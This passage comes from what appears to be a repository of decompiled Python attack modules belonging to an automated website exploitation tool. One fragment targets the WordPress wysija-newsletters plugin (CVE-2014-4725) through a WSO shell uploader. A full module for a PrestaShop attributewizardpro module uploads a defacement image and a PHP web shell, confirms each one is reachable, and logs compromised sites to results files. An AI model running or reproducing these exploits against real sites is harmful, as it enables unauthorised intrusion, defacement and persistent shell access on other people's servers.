'\n') 29 | wsoShellUploaderModule.UploadWso2(site + '/wp-content/uploads/wysija/themes/rock/vuln.php') 30 | if 'GIF89a' in str(CheckIndex.content): 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n') 33 | return printModule.returnYes(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') 34 | else: 35 | return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') 36 | 37 | else: 38 | return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') 39 | except: 40 | return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_attributewizardpro3.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_attributewizardpro3.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/attributewizardpro.OLD/file_upload.php' 22 | FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} 23 | FileDataShell = {'userfile': open(ShellPresta, 'rb')} 24 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) 25 | if Jce_Deface_image.split('/')[1] in GoT.content: 26 | Index = GoT.content.split('|||')[0] 27 | IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index 28 | CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) 29 | if 'GIF89a' in CheckIndex.content: 30 | with open('result/Index_results.txt', 'a') as writer: 31 | writer.write(IndexPath + '\n') 32 | Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers) 33 | if ShellPresta.split('/')[1] in GoT.content: 34 | Shell = Got2.content.split('|||')[0] 35 | ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell 36 | CheckShell = requests.get('http://' + ShellPath, timeout=5, headers=Headers) 37 | if 'Vuln!!' in CheckShell.content: 38 | with open('result/Shell_results.txt', 'a') as writer: 39 | writer.write(ShellPath + '\n') 40 | return printModule.returnYes(site, 'N/A', 'attributewizardpro3 Module', 'Prestashop') 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'attributewizardpro3 Module', 'Prestashop') 43 | 44 | else: 45 | return printModule.returnNo(site, 'N/A', 'attributewizardpro3 Module', 'Prestashop') 46 | except: 47 | return printModule.returnNo(site, 'N/A', 'attributewizardpro3 Module', 'Prestashop') --------------------------------------------------------------------------------